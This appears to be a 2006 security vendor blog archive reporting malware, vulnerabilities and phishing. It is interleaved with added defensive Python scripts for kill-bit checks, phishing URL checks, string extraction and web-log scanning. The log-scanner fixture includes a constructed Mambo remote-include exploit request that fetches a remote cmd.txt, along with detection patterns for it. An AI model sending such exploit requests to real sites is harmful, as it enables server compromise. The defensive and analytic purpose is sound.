Archives for February 2006

Two New Mobile Malwares

  • Posted: February 28, 2006
  • Author: Virus Analyst

Yes, we’re currently in the process of acquiring these samples. What samples? First up, there’s the ‘RedBrowser’ malware. Then there’s this one from mobileav.org, and I quote:


The Mobile Malware Researchers Association (MARA) today announced that it has characterized the first malware to cross-infect a handheld phone or PDA from a binary on the desktop PC. The malware, a Trojan dubbed “crossover”, spreads from a Win32 desktop machine to a Windows Mobile Pocket PC handheld.



Update(JJ, 01 March 2006 08:31:52)


The first one (‘RedBrowser’) will be detected as SYMBOS_REDBROW.A


Read more

WinAmp 5.2 is out

  • Posted: February 28, 2006
  • Author: Virus Analyst

Shortly after version 5.13, here comes 5.2. Version 5.2 fixes some bugs found after the release of 5.13, which was released when vulnerabilities allowing code execution were discovered in 5.12.


After 5.13 was released, a number of other buffer overflows were discovered. However, of the three different exploits I’ve seen, none of them appears to be exploitable in a way that lets the attacker gain control of the program.


When testing the exploits/vulns, all I saw were different buffers being overflowed, but no way to gain control of the program (which is one reason why you didn’t see any blog entries from me about those vulnerabilities).


Well, that’s what I saw in my tests. Mostly just a DoS attack.


Anyway, if you have WinAmp, do update to the latest version.


Read more

Adobe Macromedia ShockWave Code Execution

  • Posted: February 27, 2006
  • Author: Virus Analyst

A vulnerability was found in ShockWave that would allow remote code execution.


The vulnerability details below were taken from the Zero Day Initiative:


This specific flaw exists within the ActiveX control with CLSID 166B1BCA-3F9C-11CF-8075-444553540000. Specifying large values for two specific parameters to this control results in an exploitable stack based buffer overflow. Due to the nature of this vulnerability, the target user is not required to have fully completed an installation of Shockwave to be vulnerable.


Adobe has already been informed and has already fixed the issue in the installer.


The advisory made by Zero Day Initiative can be found here.
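For a client-side check that goes with the advisory above: the usual Internet Explorer mitigation for a vulnerable ActiveX control is the “kill bit”, a 0x400 flag in the control’s Compatibility Flags value under the ActiveX Compatibility registry key. The script below reads that value for the CLSID quoted in the advisory. It is an added example, not code from this post, Adobe or the Zero Day Initiative; the function names are ours, and on a non-Windows host it simply reports that the registry cannot be read.

```python
"""Check whether Internet Explorer's kill bit is set for an ActiveX CLSID.

Added example, not code from the original post, Adobe or the Zero Day
Initiative. SHOCKWAVE_CLSID is the CLSID quoted in the advisory text above;
the registry location and the 0x400 kill-bit flag are Internet Explorer's
documented ActiveX Compatibility mechanism. Function names are ours.
"""
import sys

# CLSID named in the advisory excerpt above (the registry keys it with braces)
SHOCKWAVE_CLSID = "{166B1BCA-3F9C-11CF-8075-444553540000}"

# Per-control compatibility flags live under this key in HKLM
COMPAT_KEY = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"

# Bit in the "Compatibility Flags" DWORD that stops IE from instantiating the control
KILL_BIT = 0x400


def kill_bit_set(compat_flags):
    """True if the kill bit is present in a Compatibility Flags DWORD."""
    return bool(compat_flags & KILL_BIT)


def read_compat_flags(clsid):
    """Compatibility Flags for clsid: the DWORD value, 0 when no entry exists,
    or None when not on Windows (the winreg module is Windows-only)."""
    if not sys.platform.startswith("win"):
        return None
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, COMPAT_KEY + "\\" + clsid) as key:
            value, value_type = winreg.QueryValueEx(key, "Compatibility Flags")
    except OSError:
        return 0  # key or value missing: no kill bit set
    return int(value) if value_type == winreg.REG_DWORD else 0


def control_blocked(clsid):
    """None when the registry cannot be read here, else whether IE blocks clsid."""
    flags = read_compat_flags(clsid)
    return None if flags is None else kill_bit_set(flags)


if __name__ == "__main__":
    state = control_blocked(SHOCKWAVE_CLSID)
    if state is None:
        print("Not on Windows; run this on the client to inspect the registry.")
    else:
        print(f"{SHOCKWAVE_CLSID}: kill bit {'set' if state else 'NOT set'}")
```

The kill bit is a browser-side stopgap: it prevents IE from loading the control at all, so it is a trade-off against the control’s legitimate use, and the fix the post refers to (the updated installer) is the actual remedy.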


Read more

Online News site hacked

  • Posted: February 27, 2006
  • Author: Virus Analyst

We’ve just received reports of a New York online newspaper site that has been hacked and is now serving malware (a backdoor) through an old exploit. We visited the site (using a test system, of course), and true enough, some pages did contain malicious code, installed using an old exploit (MS04-013).


So, it’s always a good idea to keep ALL systems patched. Not only Windows, or Microsoft products, but ALL systems. And, always keep your antivirus programs updated.



Update(JJ, 27 February 2006 22:53:52)


The malicious files are to be detected as: BKDR_DELF.AQM and CHM_DELF.AVL.


Read more

On Mambo and Phishing

  • Posted: February 27, 2006
  • Author: Virus Analyst

No, they’re not related.


First up: the Mambo exploit. We still keep receiving packets that attempt to exploit Mambo (and a few XML-RPC exploit attempts as well). And the thing is, even though the exploit code downloads a filename that we saw, say, two weeks ago, that same filename now contains different code. Again, this just shows that lots of users still have not patched their Mambo installations. Oh, by the way, the malware in question appears to be a worm (again) that exploits Mambo as well as XML-RPC.


And, another phishing attempt. This was from a friend of mine:



It’s possible that she was a victim of a previous phish. *sigh* I’ll have to contact her to tell her to change her password. By the way, by this time, you should already know how to spot fake URLs. For this one, if you go to the site (but I advise you not to, since I don’t know what other tricks the site has), you will be presented with a Yahoo Games login. But then, when you look at the URL, it says sexy_photos_hot. Yahoo Games? Sexy Photos? No. Also, the REAL Yahoo Games site is not at Geocities (even though Geocities IS a part of Yahoo). It’s at games.yahoo.com.
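The “look at the URL” advice above comes down to one rule: only the hostname decides whose page you are on, and the brand name appearing in the path or before an `@` proves nothing. The following script is an added example, not code from this post; the sample URLs are constructed (the real phishing address is not reproduced), and only games.yahoo.com, named in the post, is the genuine host.

```python
"""Decide whether a login URL actually lives on the brand's own domain.

Added example, not code from the original post. The URLs in SAMPLES are
constructed for illustration (the real phishing address is not reproduced);
games.yahoo.com is the genuine host named in the post.
"""
from urllib.parse import urlsplit


def host_of(url):
    """Lower-cased hostname of url, with any user:pass@ and :port removed."""
    if "://" not in url:
        url = "http://" + url  # bare hosts as pasted into chat
    return urlsplit(url).hostname


def host_belongs_to(url, domain):
    """True only if the host is domain or a subdomain of it.

    The brand name appearing elsewhere (the path, or the user-info part in
    "http://games.yahoo.com@evil.example/") does not count.
    """
    host = host_of(url)
    if not host:
        return False
    domain = domain.lower().strip(".")
    return host == domain or host.endswith("." + domain)


def classify(url, brand_domain, brand_words):
    """Label for a URL that presents itself as a brand_domain login page."""
    if host_belongs_to(url, brand_domain):
        return "genuine host"
    if any(w in url.lower() for w in brand_words):
        return "brand name present, host is not " + brand_domain
    return "unrelated host"


# Constructed sample URLs, paired with the verdict classify() should give
SAMPLES = [
    ("http://games.yahoo.com/", "genuine host"),
    ("http://www.geocities.com/some_profile/yahoo_games/login.htm",
     "brand name present, host is not yahoo.com"),
    ("http://games.yahoo.com@203.0.113.5/login",
     "brand name present, host is not yahoo.com"),
    ("http://yahoo.com.evil.invalid/games/",
     "brand name present, host is not yahoo.com"),
    ("http://photos.example.invalid/", "unrelated host"),
]


def check_samples():
    """Run classify over SAMPLES; returns the list of (url, verdict)."""
    return [(url, classify(url, "yahoo.com", ["yahoo", "games"])) for url, _ in SAMPLES]


if __name__ == "__main__":
    for url, verdict in check_samples():
        print(f"{verdict:45s} {url}")
```

Note the third sample: `urlsplit().hostname` correctly discards the `games.yahoo.com@` user-info prefix, a trick that fools a reader scanning the address bar from the left.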


Read more

WORM_BAGLE.DN

  • Posted: February 27, 2006
  • Author: Virus Analyst

We received a malware sample; here are some details.

Filename: RR-0922-014.exe
Filesize: 5,492 bytes
MD5: EBC2BA74578CB23AF083C89B31060A28

Detection (as of 2006-02-25 22:23:34)




Trend Micro: PAK_Generic.001



Read more

Chatting with a Bot: BKDR_CONTACT.O

  • Posted: February 23, 2006
  • Author: Virus Analyst

Remember our previous post on IM worms that chat with the target? Well, here’s a similar instance. Check it out.






Current detection:


FileName : SexyGirl.zip/SexyGirl.scr
TrendMicro : PAK_Generic.001



Based on an initial string-based analysis, we did not find the strings of the chat in the malware. Ruling out the possibility that they are encrypted (for simplicity’s sake), this could mean that the “chatters” (latia, Whyn0tt_87, D115ny_cute) are actual bot-infected systems which were instructed to propagate the malicious link via IRC, much like the AOL propagation used by bots. The botmaster can control the links. Or, the botmasters created legitimate IRC ‘bots’ that park on the channel and send the messages to the users of the channel. Yes, there are legitimate IRC ‘bots’. Google for irc bots.


Update(JJ, 23 February 2006 00:14:56)


So I decided to delve deeper into this bot, and the botmaster does control the IRC messages that it sends out. This is its infection vector, as the bot does not have any commands to exploit other systems automatically. Also, this bot does not join a channel, AND the server that it joins is a legit one. The botmaster has a script to tell the infected systems to “propagate” the “Sexy Girl” and “Full Sex Movie” links. And still, there are many users who are infected (based on the logs that I took).
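The “string-based analysis” step in this post (look for the chat text inside the binary; if it is absent and not encrypted, the text must come from the server) is easy to reproduce. The script below is an added example, not the analysts’ own tooling: it extracts ASCII and UTF-16LE printable runs the way the Unix `strings` tool does and reports whether the quoted link texts occur. The two byte blobs are constructed here and are not the SexyGirl.scr sample; the first models the post’s finding (no chat strings), the second shows a positive hit for comparison.

```python
"""Extract printable strings from a binary and check for expected phrases.

Added example, not the analysts' own tooling from the post. SAMPLE_NO_CHAT
and SAMPLE_WITH_CHAT are constructed byte strings, not the SexyGirl.scr
sample; the chat phrases are the link texts quoted in the post.
"""
import re


def extract_strings(data, min_len=4):
    """Return ASCII and UTF-16LE printable runs of at least min_len chars,
    the same thing the Unix `strings` tool (with -el for wide) reports."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found


def phrases_present(data, phrases, min_len=4):
    """Map each phrase to whether it appears (case-insensitively) in any string."""
    strings = [s.lower() for s in extract_strings(data, min_len)]
    return {p: any(p.lower() in s for s in strings) for p in phrases}


# Link texts the bot was observed sending (quoted in the post)
CHAT_PHRASES = ["Sexy Girl", "Full Sex Movie"]

# Constructed: non-printable filler around an IRC server name and a wide-char
# IRC command, with no chat text at all, matching the post's finding
_FILLER = bytes(range(0x80, 0xff)) * 3
SAMPLE_NO_CHAT = (_FILLER + b"irc.example.invalid\x00" + _FILLER
                  + "NICK\x00".encode("utf-16-le") + _FILLER)

# Constructed: same layout but with one chat phrase embedded as UTF-16LE
SAMPLE_WITH_CHAT = (_FILLER + b"irc.example.invalid\x00" + _FILLER
                    + "Full Sex Movie".encode("utf-16-le") + _FILLER)


def analyse(data):
    """Convenience wrapper returning (strings found, phrase verdicts)."""
    return extract_strings(data), phrases_present(data, CHAT_PHRASES)


if __name__ == "__main__":
    for name, blob in (("no chat", SAMPLE_NO_CHAT), ("with chat", SAMPLE_WITH_CHAT)):
        strings, verdicts = analyse(blob)
        print(name, strings, verdicts)
```

A negative result from this pass is only as strong as the post’s stated assumption: packed or encrypted samples (note the PAK_Generic detection above) hide their strings until unpacked, so an absent phrase means “not in the clear”, not “not present”.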


Read more

Mambo/XML_RPC worm making the rounds (Again)

  • Posted: February 21, 2006
  • Author: Virus Analyst

Port 80 malware traffic is quite high, particularly traffic exploiting the Mambo mosConfig vulnerability. This exploit is not new. It just means that attackers are still able to successfully compromise vulnerable machines.


The exploit downloads a shell script, which in turn downloads and executes other malware, including the actual worm that does the exploiting (it also has a module for exploiting the XML-RPC vulnerability), as well as an IRC client (yes, to take part in an eveeel botnet server).


What malware is this, you say? Check out our Virus Encyclopedia for the following:



  • ELF_LUPPER
  • PERL_SHELLBOT
  • ELF_KAITEN
  • ELF_MARE

And if I missed something, you can always check our Advisories page for the latest malwares from our honeypots.
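Both this post and the earlier “On Mambo and Phishing” entry describe the same port-80 pattern: requests that feed the Mambo mosConfig variable a remote URL, plus the worm’s XML-RPC module hitting xmlrpc.php. A web server’s own access log is enough to see this traffic, and the script below, an added example rather than code from either post, scans such logs for the two indicators. The log lines are constructed (documentation IP ranges); the mosConfig indicator is the remote-include form of the exploit discussed above, while a POST to xmlrpc.php is only a hint to inspect, since legitimate clients use that endpoint too.

```python
"""Flag Mambo mosConfig remote-include attempts and xmlrpc.php POSTs in web logs.

Added example, not code from the original posts. LOG_LINES are constructed
(documentation IP ranges). The first indicator is a client-supplied
mosConfig_* parameter whose value is a remote URL, the form of the Mambo
exploit discussed above; the second is a POST to xmlrpc.php, which the same
worm's XML-RPC module targets but which legitimate clients also use.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format: client, ident, user, [timestamp], "method path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line):
    """Dict of fields for a well-formed access-log line, else None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(method, path):
    """Return an indicator label for a request line, or None if unremarkable."""
    parts = urlsplit(path)
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        # A mosConfig_* variable supplied by the client that points at a
        # remote URL is the remote-include exploit itself.
        if key.lower().startswith("mosconfig_") and any(
            v.lower().startswith(REMOTE_SCHEMES) for v in values
        ):
            return "mambo-mosconfig-remote-include"
    if method == "POST" and parts.path.lower().endswith("/xmlrpc.php"):
        return "xmlrpc-post"
    return None


def scan(lines):
    """List of (client ip, label, path) for every line that trips an indicator."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line: skip rather than crash the sweep
        label = classify_request(rec["method"], rec["path"])
        if label:
            hits.append((rec["ip"], label, rec["path"]))
    return hits


# Constructed access-log lines; 203.0.113.7 plays the attacking host
LOG_LINES = [
    '203.0.113.7 - - [21/Feb/2006:10:02:11 +0000] "GET /index.php?option=com_content&mosConfig_absolute_path=http://198.51.100.9/cmd.txt? HTTP/1.1" 200 512',
    '192.0.2.44 - - [21/Feb/2006:10:02:13 +0000] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 8123',
    '203.0.113.7 - - [21/Feb/2006:10:02:20 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371',
    '198.51.100.23 - - [21/Feb/2006:10:03:01 +0000] "GET /images/logo.gif HTTP/1.1" 304 -',
    'garbage line that does not parse',
]


if __name__ == "__main__":
    for ip, label, path in scan(LOG_LINES):
        print(f"{ip:15s} {label:32s} {path}")
```

A 200 status on the mosConfig line is the detail worth acting on: a patched Mambo ignores the injected variable, while a vulnerable one fetches and runs the remote file, which is the shell-script download stage described above.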

Read more

Another OSX Malware-PoC

  • Posted: February 21, 2006
  • Author: Virus Analyst

After OSX_LEAP.A, here comes another malware PoC for OSX: OSX_INQTANA.A.


I leave the link-clicking-read-the-details to you.


Read more

More Proof of Concepts Coming Out

  • Posted: February 21, 2006
  • Author: Virus Analyst

A couple of days after Microsoft released their monthly security patch, proof-of-concept (PoC) code was posted by FrSIRT targeting the MS06-005 vulnerability. (Check our previous blog entry here.)


Another version of the exploit code was released and posted by FrSIRT for MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution.

On the other hand, a proof of concept for MS06-009: Vulnerability in the Korean Input Method Editor Could Allow Elevation of Privilege [ShellAbout() API Elevation of Privilege] was posted by Securiteam. (This one’s really easy to do.) :)

Visit the following link for Trend Micro’s information on Microsoft’s February Security patch.



  • http://www.trendmicro.com/vinfo/default.asp?sect=SA

Read more
  • Copyright © 2021 Trend Micro Incorporated. All rights reserved.